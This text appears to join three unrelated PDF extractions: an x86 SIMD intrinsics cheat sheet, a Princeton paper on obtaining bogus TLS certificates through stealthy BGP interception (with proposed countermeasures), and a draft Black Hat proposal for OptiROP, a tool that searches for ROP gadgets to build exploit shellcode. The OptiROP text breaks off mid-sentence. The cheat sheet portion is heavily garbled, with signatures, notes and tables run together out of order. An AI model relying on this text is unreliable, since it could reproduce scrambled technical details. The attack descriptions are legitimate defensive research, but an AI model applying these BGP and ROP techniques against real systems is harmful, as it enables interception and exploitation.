_SIDD_SWORD_OPS signed 16-bit chars
_SIDD_CMP_EQUAL_ANYFor each character c in a, determine 
iff any character in b is equal to c.
_SIDD_CMP_RANGESFor each character c in a, determine 
whether b0 <= c <= b1 or b2 <= c <= b3...
_SIDD_CMP_EQUAL_EACHCheck for string equality of a and b _SIDD_CMP_EQUAL_ORDERED
Search substring b in a. Each byte where 
b begins in a is treated as match.
_SIDD_POSITIVE_POLARITY Match is indicated by a 1-bit.
_SIDD_NEGATIVE_POLARITYNegation of resulting bitmask.
_SIDD_MASKED_NEGAT
IVE_POLARITYNegation of resulting bitmask 
except for bits that have an index 
larger than the size of a or b.Data type specifier
Compare mode specifier
Polarity specifierCyclic Redundancy
  Check (CRC32)
crc32
u8-u64
NOTE: Starting with the initial 
value in crc, accumulates a 
CRC32 value for unsigned X-
bit integer v, and stores the 
result in dst.SSE4.2uX Single X bit unsigned integer (not in SSE register)CLMUL
CLMULSSE4.2
Westmere 10Carryless Mul
clmulepi64
si128
NOTE: Perform a carry-less 
multiplication of two 64-bit 
integers, selected from a 
and b according to imm, and 
store the results in dst 
(result is a 127 bit int).Convert Float
16bit  ↔ 32bit 
cvtX_Y
ph ↔ ps
NOTE: Converts between 4x 
16 bit floats and 4x 32 bit 
floats (or 8 for 256 bit 
mode). For the 32 to 16-bit 
conversion, a rounding mode 
r must be specified.
ph Packed half float (16 bit float)CVT16
m cvtph_ps(mi a)
mi cvtps_ph(m a, i r)
AES Decrypt 
aesdec[last]
si128
NOTE: Perform one round of 
an AES decryption flow on the 
state in a using the round 
key. The last version 
performs the last round.AES
u crc32_u32(u crc,u v)128
≤64 128AES Encrypt 
aesenc[last]
si128
NOTE: Perform one round of 
an AES encryption flow on the 
state in a using the round 
key. The last version 
performs the last round.AES
mi aesenc_si128(mi a,mi key)128AES Inverse Mix 
Columns 
aesimc
si128
NOTE: Performs the inverse 
mix columns transformation 
on the input.AES
mi aesimc_si128(mi a)128AES KeyGen 
Assist
aeskeygenassist
si128
NOTE: Assist in expanding the 
AES cipher key by computing 
steps towards generating a 
round key for encryption cipher 
using data from a and an 8-bit 
round constant specified in i.AES
mi aeskeygenassist_si128
(mi a,ii i)128Extract Bits
_bextr
u32-64BMI1≤64
NOTE: Extracts l bits from a 
starting at bit s.
u64 _bextr_u64(u64 a,u32 s,u32 l)
(a >> s) & ((1 << l)-1) Bit Scan 
Forward/Reverse
_bit_scan_forward
/reverse
(i32)≤64
NOTE: Returns the index of 
the lowest/highest bit set in 
the 32bit int a. Undefined if 
a is 0.
i32 _bit_scan_forward(i32 a)
Byte Swap
_bswap[64]
(i32,i64)x86≤64
NOTE: Swaps the bytes in 
the 32-bit int or 64-bit int.
i64 _bswap64(i64 a)x86
Find Lowest 
1-Bit
_blsi
u32-64BMI1≤64
NOTE: Returns an int that 
has only the lowest 1-bit in a 
or no bit set if a is 0.
u64 _blsi_u64(u64 a)
(-a) & aMask Up To 
Lowest 1-Bit
_blsmsk
u32-64BMI1≤64
NOTE: Returns an int that 
has all bits set up to and 
including the lowest 1-bit in 
a or no bit set if a is 0.
u64 _blsmsk_u64(u64 a)
(a-1) ^ aReset Lowest 
1-Bit
_blsr
u32-64BMI1≤64
NOTE: Returns a but with 
the lowest 1-bit set to 0.
u64 _blsr_u64(u64 a)
(a-1) & aZero High Bits
_bzhi
u32-64BMI2≤64
NOTE: Zeros all bits in a 
higher than and including 
the bit at index i.
u64 _bzhi_u64(u64 a, u32 i)
dst := a
IF (i[7:0] < 64)
 dst[63:n] := 0Rotate Left/
Right
_[l]rot[w]l/r
(u16-64)x86≤64
NOTE: Rotates bits in a left/
right by a number of bits 
specified in i. The l version 
is for 64-bit ints and the w 
version for 16-bit ints.
u64 _lrotl(u64 a)
Count Leading 
Zeros
_lzcnt
u32-64LZCNT≤64
NOTE: Counts the number of 
leading zeros in a.
u64 _lzcnt_u64(u64 a)Bit Gather
(Extract)
_pext
u32-64BMI2≤64
NOTE: Extract bits from a at 
the corresponding bit 
locations specified by mask 
m to contiguous low bits in 
dst; the remaining upper 
bits in dst are set to zero.
u64 _pext_u64(u64 a, u64 m)Bit Scatter
(Deposit)
_pdep
u32-64BMI2≤64
NOTE: Deposit contiguous 
low bits from a to dst at 
the corresponding bit 
locations specified by mask 
m; all other bits in dst are 
set to zero.
u64 _pdep_u64(u64 a,u64 m)
Count 1-Bits 
(Popcount)
popcnt
u32-64POPCNT≤64
NOTE: Counts the number of 
1-bits in a.
u32 popcnt_u64(u64 a)Count Trailing 
Zeros
_tzcnt
u32-64BMI1≤64
NOTE: Counts the number of 
trailing zeros in a.
u64 _tzcnt_u64(u64 a)
FM-Add
f[n]madd FMA
ps/d,ss/d
NOTE: Computes (a*b)+c 
for each element. The n 
version computes -(a*b)+c.FM-Sub
f[n]madd FMA
ps/d,ss/d
NOTE: Computes (a*b)-c 
for each element. The n 
version computes -(a*b)-c.
m fmadd_ps(m a,m b,m c)m fmsub_ps(m a,m b,m c)FM-AddSub
fmaddsub FMA
ps/d,ss/d
NOTE: Computes (a*b)+c 
for elements with even index 
and (a*b)-c for elements 
with odd index.mi mullo_epi16(mi a,mi b)
FM-SubAdd
fmsubadd FMA
ps/d,ss/d
NOTE: Computes (a*b)-c 
for elements with even index 
and (a*b)+c for elements 
with odd index.
m fmsubadd_ps(m a,m b,m c)v sfence()
v lfence()
v mfence()mi stream_load_si128
(mi* ptr)md load_pd(d* ptr)
md loadu_pd(d* ptr)mi lddqu_si128(mi* ptr)
md load1_pd(d* ptr)
md load_sd(d* ptr)
mi aesdec_si128(mi a,mi key)mi abs_epi16(mi a)
mi sign_epi16(mi a,mi b)mi sllv_epi32(mi a,mi b) mi slav_epi32(mi a,mi b)mi srai_epi32(mi a,ii32 i)
mi sra_epi32(mi a,mi b)mi slli_epi32(mi a,ii i)
mi sll_epi32(mi a,mi b)
i comieq_sd(mi a,mi b) md cmp_pd(md a,md b,ii imm)md cmpord_pd(md a,md b)md cmpeq_pd(md a,md b)md round_pd(md a,i r)md floor_pd(md a)md ceil_pd(md a)
m rsqrt_ps(m a)m rcp_ps(m a) m sqrt_ps(m a) m div_ps(m a,m b)mi mulhi_epi16(mi a,mi b)
mi mul_epi32(mi a,mi b)
mi clmulepi64_si128
(mi a,mi b,ii imm)mi mulhrs_epi16(mi a,mi b)
mi hadds_epi16(mi a,mi b)mi hadd_epi16(mi a,mi b)mi add_epi16(mi a,mi b)mi adds_epi16(mi a,mi b)
mi hsubs_epi16(mi a,mi b)mi hsub_epi16(mi a,mi b)mi sub_epi16(mi a,mi b)mi subs_epi16(mi a,mi b)
mi maddubs_epi16(mi a,mi b)
mi madd_epi16(mi a,mi b)
mi sad_epu8(mi a,mi b)mi xor_si128(mi a,mi b)mi and_si128(mi a,mi b) mi or_si128(mi a,mi b)
v zeroupper()v zeroall()mi undefined_si128()v prefetch(c* ptr,i i)
v pause()v clflush(v* ptr)
v mwait(u ext,u hints)u getcsr()
v setcsr(u a)m256 castpd_ps(m256d a)m128d castpd256_pd128(m256d a)md castsi128_pd(mi a)
m cvt_si2ss(m a,i b)128
f cvtss_f32(m a)
mi cvtsi32_si128(i a)
i cvtss_si32(m a)md cvtepi32_pd(mi a)mi cvtepu8_epi32(mi a) mi cvtepi8_epi32(mi a)
mi pack_epi32(mi a,mi b)
mi setzero_si128()mi set1_epi32(i a)
m broadcast_ss(f* a)
mi broadcastb_epi8(mi a)Broadcast 
Load
loaddup
pd
NOTE:  Loads a 64-bit float 
from memory into all slots of 
the 128-bit register.128
md loaddup_pd(d* ptr)SSE3mi set_epi32(i a,i b,i c,i d)mi setr_epi32(i a,i b,i c,i d)
m moveldup_ps(m a)m permutevar8x32_ps(m a,mi b)
mi bsrli_si128(mi a,ii i)v store_pd(d* ptr,md a)v store1_pd(d* ptr,md a)Concatenate and 
Byteshift (Align)
alignr SSSE3
mi alignr_epi8(mi a,mi b,i c)
((a << 128) | b) >> c*8Inserting data into an register without loading from memory
Change the order of bytes in a register, duplicating or zeroing 
bytes selectively or mixing the bytes of two registers
Replicating one element in a register 
to fill the entire registerExtraction
Extract
extract
epi16[SSE2],
epi8-64,ps
i extract_epi16(mi a,ii i)
(a>>(i[2:0]*16))[15:0]NOTE: Extracts one element 
and returns it as a normal int 
(no SSE register!)SSE4.1128
256bit Extract
extractf128
si256,ps/d
m128 extractf128_ps
(m256 a,ii i)
(a >> (i * 128))[128:0]NOTE: Extracts 128bit and 
returns it as a 128bit SSE 
register. For AVX2, there is 
only si256 and the 
operation is named 
extracti128.256
AVX2AVXMin/Max/Avg
Average
avg
epu8-16SSE2Max
max SSE4.1
SSE:ps SSE2:epu8, 
epi16,pd
SSE4.1:
epi8-32,epu8-32SSE2Min
min SSE4.1
SSE:ps SSE2:epu8, 
epi16,pd
SSE4.1:
epi8-32,epu8-32SSE2Horizontal 
Min
minpos SSE4.1
epu16
NOTE: Computes horizontal 
min of one input vector of 
16bit uints. The min is stored in 
the lower 16 bits and its index 
is stored in the following 3 bits 128
mi minpos_epu16(mi a)mi min_epu16(mi a,mi b)mi max_epu16(mi a,mi b)mi avg_epu16(mi a,mi b)
Int Compare
Int Compare
cmpZ
epi8-32,epi64[SSE4.1]SSE2
NOTE: Z can be one of:
lt/gt/eq.Elements that 
equal receive 1s in all bits, 
otherwise 0s.
mi cmpeq_epi8(mi a,mi b)Float Compare
cmp[n]Z
ps/d,ss/d,
si128[SSE4.1]SSE2
NOTE: Z can be one of:
ge/le/lt/gt/eq
Returns a single int that is 
either 1 or 0. The n version is 
a not version, e.g., neq 
computes not equal.128
md cmpeq_pd(md a,md b)Name: Human readable 
name of the operation
Name(s) of the intrinsic: The names of the various flavors of the intrinsic. To assemble the final name to be used for an intrinsic, one must add a 
prefix and a suffix. The suffix determines the data type (see next field). Concerning the prefix, all intrinsics, except the ones which are prefixed with 
a green underscore _, need to be prefixed with _mm_ for 128bit versions or _mm256_ for 256bit versions. Blue letters in brackets like [n] 
indicate that adding this letter leads to another flavor of the function. Blue letters separated with a slash like l/r indicate that either letter can be 
used and leads to a different flavor. The different flavors are explained in the notes section. A red letter like Z indicates that various different 
strings can be inserted here which are stated in the notes section.
List of available data type suffixes: Consult the suffix table for further information about the various possible suffixes. The suffix chosen 
determines the data type on which the intrinsic operates. It must be added as a suffix to the intrinsic name separated by an underscore, so a 
possible name for the data type pd in this example would be _mm_cmpeq_pd. A suffix is followed by an instruction set in brackets, then this 
instruction set is required for the suffix. All suffixes without an explicit instruction set are available in the instruction set specified at the left.
If no type suffixes are shown, then the method is type independent and must be used without a suffix. If the suffixes are in parenthesis, the suffixes 
must not be appended and are encoded into the name of the intrinsic in another way (see notes for further information).
Notes: Explains the semantics 
of the intrinsic, the various 
flavors, and other important 
information.Signature and Pseudocode: Shows one possible signature of the intrinsic in order to depict the parameter types and the return type. Note that only 
one flavor and data type suffix is shown; the signature has to be adjusted for other suffixes and falvors. The data types are displayed in shortened 
form. Consult the data types table for more information.
In addition to the signature, the pseudocode for some intrinsics is shown here. Note that the special variable dst depicts the destination register of 
the method which will be returned by the intrinsic.Available Bitwidth: If no bitwidth is specified, the operation is available for 128bit and 256bit SSE registers. Use the _mm_ prefix for the 128bit and 
the _mm256_ prefix for the 256bit flavors. Otherwise, the following restrictions apply:
            : Only available for 256bit SSE registers (always use _mm256_ prefix)
            : Only available for 128bit SSE registers (always use _mm_ prefix)
            : Operation does not operate on SSE registers but usual 64bit registers (always use _mm_ prefix)256
128
≤64
SEQ!Sequence Indicator: If this 
indicator is present, it means 
that the intrinsic will 
generate a sequence of 
assembly instructions instead 
of only one. Thus, it may not 
be as efficient as anticipated.
Instruction Set: Specifies the 
instruction set which is 
necessary for this operation. 
If more than one instruction 
set is given here, then 
different flavors of this 
operation require different 
instruction sets.
Data Types
iiImmediate signed 32 bit integer: The value used for 
parameters of this type must be a compile time constant
miInteger SSE register, i.e., __m128i or __m256i, 
depending on the bitwidth used.i Signed 32 bit integer (int)
iX Signed X bit integer (intX_t)
uX Unsigned X bit integer (uintX_t)
m32-bit Float SSE register, i.e., __m128 or __m256, 
depending on the bitwidth used.
md64-bit Float (double) SSE register, i.e., __m128d or 
__m256d, depending on the bitwidth used.f 32-bit float (float)
d 64-bit float (double)
vvoid
X* Pointer to X (X*)m/md
mi
mi
m/mdmi
mi
m,
md,mi-miSuffix Type Description Suffix Description
String Compare DescriptionSSE2
AVXSSE4.1SSE
BMI1SSSE3SSE3
AVX2
FMAx86
LZCNTPOPCNT
BMI2AES
CVT16x86 Base Instructions
Bulldozer 11Sandy Bridge 11Bulldozer 11
Haswell 13
Bulldozer 11
K10 07K10 07 Nehalem 08Penryn 07Bulldozer 11 Woodcrest 06Prescott 04 K9 05K8 03 Pentium 4 01 Pentium III 99 K7 Palomino 01 
-
Haswell 13
Haswell 13 Nehalem 08Westmere 10 Bulldozer 11
Sandy Bridge 11Bulldozer 11
- Haswell?? 14Bulldozer 11 Ivy Bridge 12Bulldozer 11Bulldozer 11Streaming SIMD 
Extensions
Advanced Vector 
Extensions
Bit Manipulation 
Instructions16-bit FloatsFused Multiply and Add
Carryless MultiplicationAdvanced Encryption Standardall allI.Set Description Intel (Year) AMD (Year)Instruction Setsx86 Intrinsics Cheat Sheet
Jan Finis
finis@in.tum.de
Introduction
This cheat sheet displays most x86 intrinsics supported by Intel processors. The following intrinsics were omitted:
· obsolete or discontinued instruction sets like MMX and 3DNow!
· AVX-512, as it will not be available for some time and would blow up the space needed due to the vast amount of new instructions
· Intrinsics not supported by Intel but only AMD like parts of the XOP instruction set (maybe they will be added in the future). 
· Intrinsics that are only useful for operating systems like the _xsave intrinsic to save the CPU state
· The RdRand intrinsics, as it is unclear whether they provide real random numbers without enabling kleptographic loopholes
Each family of intrinsics is depicted by a box  as described below. It was tried to group the intrinsics meaningfully. Most information is taken from the Intel Intrinsics Guide (http://software.intel.com/en-us/articles/intel-intrinsics-guide). Let me know 
(finis@in.tum.de) if you find any wrong or unclear content.
When not stated otherwise, it can be assumed that each vector intrinsic performs its operation vertically on all elements which are packed into the input SSE registers. E.g., the add instruction has no description. Thus, it can be assumed that it performs 
a vertical add of the elements of the two input registers, i.e., the first element from register a is added to the first element in register b, the second is added to the second, and so on. In contrast, a horizontal add would add the first element of a to the 
second element of a, the third to the fourth, and so on.
To use the intrinsics, included the <x86intrin.h> header and make sure that you set the target architecture to one that supports the intrinsics you want to use (using the -march=X compiler flag).Version 2.1f
TSX Transactional Sync. Extensions Haswell 13 -
Begin 
Transaction
_xbegin
-
NOTE: Specify the start of an 
RTM code region. If the logical 
processor was not already in 
transactional execution, then it 
transitions into transactional 
execution. On an RTM abort, 
the logical processor discards 
all architectural register and 
memory updates performed 
during the RTM execution, 
restores architectural state, 
and starts execution beginning 
at the fallback address 
computed from the outermost 
XBEGIN instruction.
u _xbegin()Commit 
Transaction
_xend
-
NOTE: Specify the end of an 
RTM code region. If this 
corresponds to the outermost 
scope, the logical processor 
will attempt to commit the 
logical processor state 
atomically. If the commit fails, 
the logical processor will 
perform an RTM abort.
v _xend()TSX
TSXAbort 
Transaction
_xabort
-
NOTE: Force an RTM abort. The 
EAX register is updated to 
reflect an XABORT instruction 
caused the abort, and the imm 
parameter will be provided in 
bits [31:24] of EAX. Following 
an RTM abort, the logical 
processor resumes execution 
at the fallback address 
computed through the 
outermost XBEGIN instruction.
v _xabort(ii imm)TSXMix the contents of two registersSet or reset a range of bitsChange the position of selected bits, zeroing out 
remaining ones
Count specific ranges of 0 or 1 bitsConvert all elements in a packed SSE register
Convert a single element in the lower bytes of an SSE register
Perform more than one operation at once
Perform a bitwise operation and check whether all bits 
are 0s afterwardsLoading data into an SSE register or storing data from an SSE register
Loading data into an SSE register
Storing data to a memory address which must be 16-
byte aligned (or 32-byte for 256bit instructions)
Storing data to a memory address which does 
not have to be aligned to a specific boundaryLoading data from a memory address which must be 
16-byte aligned (or 32-byte for 256bit instructions)
Loading data from a memory address which does 
not have to be aligned to a specific boundary
epi8
SSE2SSE
i cmpistra(mi a,mi b,ii i)
i cmpestra
(mi a,i la,mi b,i lb,ii i)i cmpistrc(mi a,mi b,ii i)
i cmpestrc
(mi a,i la,mi b,i lb,ii i) i cmpistri(mi a,mi b,ii i)
i cmpestri
(mi a,i la,mi b,i lb,ii i) mi cmpistrm(mi a,mi b,ii i)
mi cmpestrm
(mi a,i la,mi b,i lb,ii i)Using BGP to Acquire Bogus TLS Certificates
Henry Birge-Lee1, Yixin Sun1, Annie Edmundson1, Jennifer Rexford1, and Prateek Mittal1
{birgelee, yixins, annee, jrex, pmittal }@princeton.edu
1Princeton University
ABSTRACT
Digital certificates play an important role in secure and pri-
vate communication using TLS. Thus, vulnerabilities in the
process of issuing digital certificates (identity verification)
can have devastating consequences for the security and pri-
vacy of online communications. In this talk, we explore the
impact of BGP hijack and interception attacks on the do-
main verification process of obtaining a certificate. These
attacks allow adversaries to obtain fake certificates for a
victim’s domain. While these attacks have been outlined
in recent work, no study has yet to measure the effective-
ness of these attacks on real-world certificate authorities.
In this paper we perform these BGP interception attacks
and measure the responses of some of the top certificate au-
thorities. We also propose a new BGP attack this is more
effective than those previously studied. Our results show
that none of these certificate authorities have measures in
place to prevent issuing certificates using intercepted routes
which allows an attacker to obtain a certificate for a domain
it does not control. In addition, this study presents two
countermeasures (with reference implementations) and per-
forms a detailed analysis of the false-positive rate of these
countermeasures. Our results show that with a 0.3% false-
positive rate the vast majority of attacks can be prevented.
1. INTRODUCTION
1.1 Domain validation
Upon receiving a Certificate Signing Request (CSR), a
Certificate Authority CA must verify that the party sub-
mitting the CSR actually has control over the domains that
are covered by that CSR. This process is known as domain
control verification and is a core part of the Public Key
Infrastructure (PKI) because it is the process which gives
certificates the authority to identify certain domains on the
web1. If adversaries can get a certificate for a domain they
do not control, they can start a man-in-the-middle attack
that tricks web clients that want to visit that domain into
handing over their sensitive data to the adversary.
Thus, in this study, we will focus on HTTP domain veri-
fication: the common method of domain control verification
that involves the CA requiring a user to upload a string
(specified by the CA) to a specific HTTP URL at the do-
main. Fundamentally, in order for the CA to contact the cor-
1In this paper we will focus on Domain Validation (DV) cer-
tificates even though domain control verification is an im-
portant part of Extended Validation and Organization Val-
idation certificates as well.rect web server (as opposed to a malicious server controlled
by an adversary), two levels of identifiers must be resolved.
First, the DNS name must be resolved into an IP address,
and second the IP address must be routed to the correct
server. While the ongoing deployment of a secure DNS in-
frastructure helps with the DNS resolution process [5], rout-
ing successfully to the resolved IP address remains a prob-
lem. Although prior work has shown how an adversary could
use BGP hijacking to get a fake certificate [1], it did not per-
form real-world measurements of certificate authorities or
develop solutions that could strengthen the domain verifi-
cation process. This study performs these critical steps and
exposes a larger attack surface than previously understood.
Using the BGP protocol, the most obvious method to cap-
ture traffic to a victim’s domain is with a sub-prefix hijack
where an adversary announces a route to a more specific
IP prefix containing the victim’s IP. This captures all inter-
net traffic because in BGP more-specific routes are always
preferred over more general ones. However, this attack is
visible to the entire internet making it easy for network ad-
ministrators to detect if exposed for too long. Adversaries
can also use BGP to more stealthily hijack only part of the
internet [1], but these attacks are also limited in that they
require the adversary to have a specific location in the inter-
net topology. Our research shows how an adversary in any
location can perform a similarly stealthy attack.
2. BGP ATTACKS
2.1 AS Path Poisoning for a Stealthy Attack
Here we present what we see as the most effective attack
in this space: the sub-prefix interception attack. While this
attack has been outlined before [3], it has never been con-
sidered for obtaining fake certificates. The attack which in-
volves an adversary announcing a sub-prefix would normally
spread to the entire internet. However, the adversary uses
a technique known as AS path poisoning (where certain AS
numbers are prepended to the announcement) to prevent
select ASs from importing the route due to loop detection.
This can be used to maintain a path to the legitimate ori-
gin. With this path to the origin, an AS can perform a
global interception attack that would be harder to detect
than a hijack attack (in an interception attack, traffic to
the prefix can remain uninterrupted while in a hijack attack
many users will lose connectivity). Another important use
of AS path poisoning is to hide the route announcement so
it cannot be detected. In an extreme case, AS path poi-
soning could be used to make an announcement that would
only propagate on the path between the adversary and the
certificate authority by poisoning all ASs adjacent to this
path that would normally propagate the announcement. In
this situation an AS anywhere in the internet topology could
make an announcement that was seen by very few ASs (al-
lowing it to evade detection) and maintain fullconnectivity
to the victim’s domain from all parts of the internet. Thus
such an attack could potentially go completely unnoticed by
the community.
2.2 Executing a Real World Attack
To verify that CAs will issue certificates using hijacked
routes, we performed real-world attacks (using our own IP
prefixes and domains as to not affect any operating web
clients or domains) against the major CAs Let’s Encrypt,
and Symantec. Using the PEERING framework [4] to make
real BGP announcements, we ran a website in a /23 IP pre-
fix that we controlled. We then hijacked the IP address of
the website by announcing a more specific /24 prefix from
second “adversarial” AS, but used AS path poisoning to for-
ward traffic to the original website and not interrupt user
connectivity. The only traffic that was answered by the ad-
versary as opposed to being forwarded was traffic from the
CA we were attacking. Using this setup we were able to
obtain a certificate for the website from both CAs. We then
concluded the attack by using the newly issued certificates to
begin intercepting HTTPS traffic that had previously been
connecting to the real website. Both of these attacks were
able to begin intercepting the HTTPS connections in un-
der 12 minutes. We also tested Comodo and GoDaddy with
traditional sub-prefix hijacks and found that they were also
vulnerable. These real-world attacks confirm that an ad-
versary could indeed use a short-term BGP hijack to get a
certificate for a domain they do not control. We also noted
that each CA only contacted the domain from one IP ad-
dress which leaves them vulnerable to a local hijack like the
one previously outlined [1].
3. COUNTERMEASURES
Here we propose two countermeasures that can be imple-
mented to strengthen the domain control verification pro-
cess. The first countermeasure (5.1) forces an adversary to
announce a malicious route globally to the entire internet.
The second countermeasure (5.2) requires the adversary to
announce that same route for a significant duration. To-
gether, these two countermeasures eliminate the stealthy an-
gle of this attack and should lead to the route being seen and
blocked by network administrators.2
3.1 Multiple Vantage Point Verification
CAs are currently vulnerable to stealthy local hijacks that
are not visible to the whole internet because they only verify
the domain from their own IP address. To defend against
this, a CA should perform the domain control verification
from multiple vantage points and only consider the verifica-
tion a success if all the vantage points see it3. The number
2The countermeasures we outline are implemented in the
Let’s Encrypt code base at https://github.com/birgelee/
boulder .
3Although some have brought up multiple vantage point ver-
ification [2], it is not implemented in any of the CAs we
have tested and more importantly is not part of the CA
and Browser Forum Baseline Requirements for obtaining aand location of these vantage points are crucial. While only
one vantage point is required to detect the most localized hi-
jacks, an adversary could easily design an attack that hijacks
both the CA itself and its vantage point. A more robust ap-
proach is to have a set of vantage points that each use the
route of a different tier 1 or tier 2 provider. This way, for
an adversary to hijack all the vantage points, they would
have to hijack a large portion of the internet eliminating the
stealthiness of the equal-prefix-length attacks.
3.2 Route Age Heuristic
In addition to using multiple vantage points, CAs need
to verify the authenticity of the routes they use through
control plane data to prevent sub-prefix-hijacks that affect
the entire internet. CAs must do this verification on demand
for any prefix with no prior contact with the prefix owner.
This makes many BGP monitoring systems not applicable.
Based on recent work [6], we developed a framework CAs
can use to determine if a route is suspect by looking at how
long ago the last routing update for that prefix has been
heard. Here, in order for a route to be trusted, it can not
be based on a BGP update that is more recent than a given
threshold.
In addition, we performed a study of the effectiveness of
this metric. We used the certificate transparency project
to find out whenever a CA signed a new certificate and
cross referenced this with public BGP data to get the age of
the route used during the domain verification process. Our
preliminary results show that with a 1/1000 false-positive
rate we could require an adversary to announce a route for
at least 24 hours. This would give network administrators
enough time to detect the hijack (in addition, multiple van-
tage point verification forces the adversary’s route announce-
ment to be globally visible, making it easier to detect).
4. CONCLUSION
In this work we are able to show that it is much easier
to perform a stealthy attack against a CA than previously
anticipated. In addition, current CAs do not appear to have
any measures preventing such attacks. We then propose and
evaluate countermeasures that would require an attack to be
extremely visible for a long time before using it to issue a
certificate.
5. REFERENCES
[1] A. Gavrichenkov. Breaking HTTPS with BGP
hijacking. Black Hat USA Briefings, 2015.
[2] D. Holmes. Should you be worried about BGP hijacking
your HTTPS? Security Week , September 2015.
[3] A. Pilosov and T. Kapela. Stealing the internet: An
internet-scale man in the middle attack. Defcon, 2008.
[4] B. Schlinker, K. Zarifis, I. Cunha, N. Feamster, and
E. Katz-Bassett. Peering: An AS for Us. In Proceedings
of the ACM Workshop on Hot Topics in Networks ,
pages 18:1–18:7, 2014.
[5] C. Shar. State of DNSSEC deployment 2016. Technical
report, Internet Society, Reston, VA, December 2016.
[6] Y. Sun, A. Edmundson, N. Feamster, M. Chiang, and
P. Mittal. Counter-RAPTOR: Safeguarding Tor
Against Active Routing Attacks. IEEE S&P 2017 , Apr.
2017. arXiv: 1704.00843.
certificate.OptiROP: the art of hunting ROP gadgets
- Proposal for Blackhat USA 2013 -
Nguyen Anh Quynh < aquynh@gmail.com >
Abstract
Return-Oriented-Programming  (ROP)  is  the  fundamental  technique  to  bypass  the  
widely-used DEP-based exploitation mitigation. Unfortunately, available tools that can  
help to find ROP gadgets mainly rely on syntactic searching. This method proves to be  
in  inefficient,  time-consuming  and  makes  the  process  of  developing  ROP-based  
shellcode pretty frustrated for exploitation writers.
This research attempts to solve the problem by introducing a tool named OptiROP that 
lets  exploitation  writers  search for ROP gadgets  with semantic queries. Combining  
sophisticated techniques such as code normalization, code optimization, code slicing,  
SMT solver and some creative heuristic searching methods, OptiROP is able to discover  
desired gadgets very quickly, with much less efforts. Our tool also provides the detail  
semantic meaning of each gadget found, so users can easily decide how to chain their  
gadgets for the final shellcode.
In case where no suitable gadget is found, OptiROP tries to pick and chain available  
gadgets  to  create  a  sequence  of  gadgets  satisfying  the  input  requirements.  This  
significantly eases the hard job of shellcode writers, so they can focus their time on other  
tedious parts of the exploitation process.
This talk will entertain the audience with some live demo, so they can see how OptiROP  
generates gadgets in reality.
OptiROP supports input binary of all executable formats (PE/ELF/Macho) on x86 &  
x86_64 architectures. The tool will be released to the public after this talk for everybody  
to use.
1. Design and Implementation
This is only a draft paper describing OptiROP. The final paper will be providing more  
details on the techniques of our tool.
1.1 Semantic gadgets
1. Given an executable binary (we support all the format ELF/PE/Macho on 32-bit and  
64-bit Intel platform at the moment), OptiROP gathers all the ROP gadgets from the  
executable segments of the input file. We simply use the classic method to find gadgets:  
OptiROP looks for the gadget tail (RET or JMP instructions), then walk back to some  
extents to gather meaningful sequences of code [3]. Each chunk of code like this is a  
candidate ROP gadget. All the ROP gadgets are saved and used as input of the next step. 
2.  OptiROP normalize  all  the  ROP gadgets  using  LLVM  IR  [5].  We  use  LLVM  
framework to translate the machine code in each gadget into LLVM IR, and preserve the  
code semantics (Reference to Intel manual is a must at this step). At the output of this  
stage, for each ROP gadget we have a corresponding LLVM bitcode. 
3. We run all the LLVM bitcode of gadgets through LLVM optimizers to remove junk  
code present after the normalized process [4]. This step optimizes the bitcode to be more  
compact, so it is easier/faster for the SMT solver to process the SMT queries deriving  
from the LLVM bitcode in the next stage. 
4. We translate all the LLVM bitcode to SMT formula, so we have a formula for each  
original ROP gadget. We developed a LLVM pass for this process [6], and this pass  
analyzes the bitcode, then converts each LLVM instruction to Z3 formula [2] . All the  
original ROP gadgets and their SMT formulas are bundled together, and saved in the  
same place for searching later on. 
5. Given a semantic query from user, the query is compiled to LLVM IR and its SMT  
formula is also generated like with the ROP gadgets. This is called  user formula for 
brevity. Then one by one, on each SMT formula of the gathered ROP gadget (called  
saved formula for brevity), the SMT solver Z3 will be used to verify the equivalence of  
the saved formula and the user formula. The equivalent result confirms that this is the  
desired gadget, and the will be presented to user as searching result. 
6.  Semantic  searching  is  much  slower  than  syntactic  searching,  unfortunately.  To  
improve the performance of the finding process, we have a simple observation: the most  
expensive operation in the whole system presented above is the equivalent verification  
step done by the SMT solver (Note that the steps from gathering gadgets to generating  
SMT formulas for them can be performed only once, and in advance, so we do not take  
that into account). For this reason, we should always use some quick and cheap heuristic  
verification methods first, and use SMT solver only if we cannot avoid that. In case we  
must run the solver, we try to simplify the formula as best as we can, so the solver only  
has to deal with simple equation, which can significantly improve the speedup the  
verification routine. 
Guidance by these ideas, we use following methods, sorted by the order of execution. 
(I) We quickly check for the registers that are modified at the output of each saved  
formula. Quick pattern matching can eliminate the formulas that do not clobber the same  
set of modified registers in the user formula.  This simple trick immediately removes a  
lot of candidate gadgets in early stage, thus save a lot of time. Some evaluations told us  
that this step can remove up to 80% gadgets.
(II) We always want the shorter gadgets, so the next technique is to check to see if the  
verified gadget contains  as its postfix some already-matched gadget. If so, we can  
discard this  gadget right away. This  trick can remove up to 10% gadgets in some  
experiments. 
(III) All the saved formula actually includes a lot of "code" that are not related to the  
user  query,  thus  can  be  removed  without  causing  any  impact  to  the  equivalence  
checking. For example, a gadget might change EAX and EBX registers at the same time.  
But if the query only cares about EAX, all the code related to other registers (EBX and  
ESP in this case) can be removed from the formula. From this observation, we eliminate  
all the "unrelated code" using the code slicing technique [7]. The code slicing technique  
will be run on the formula, and cleaned formula becomes much more compact, thus  
easier to be processed by the SMT solver. This trick alone can amazingly speed up the  
performance of the verification process up to 300% in some of our experiments. 
(IV) We can avoid repeatedly verifying the slices by caching all the verified slice, and  
see if the same slice is already checked before running it through the SMT solver. Our  
experiments show that quite a lot of slices are shared between gadgets, and this trick can  
helps us cut the number of times running SMT solver by half in many cases. 
(V) We observed that in some cases, the already-present logical constraint in the saved  
formula is also what we need to prove the equivalence. A prominent example is the time  
when we want to find the gadgets that move ESP register up by some concrete distance  
(like ESP += 0x20). The constraint on ESP is always present there in gadgets due to the  
RET instruction present at the end of them. So rather than proving the equivalence, we  
can simply append above constraint (ESP += 20) to the saved formula, and verify its  
validity. This method avoids the high expense of the  Exists quantifier of equivalence  
verification, therefore much faster. Experiments showed that this trick can improve the  
performance by over 650% when applied.
1.2 Chain gadgets
 
Sometimes, OptiROP cannot find any suitable gadget from available gadgets. In this  
case,  OptiROP  can  pick  and  chain  some  gadgets  to  have  a  sequence  of  gadgets  
performing desired request. 
(I)  OptiROP  classifies  the  gadgets  according  to  their  semantics.  We  did  this  by  
generating the SMT formulas for all the gadgets, then verify them against a group of  
gadget types such as: copying concrete value to registers, copy register to register,  
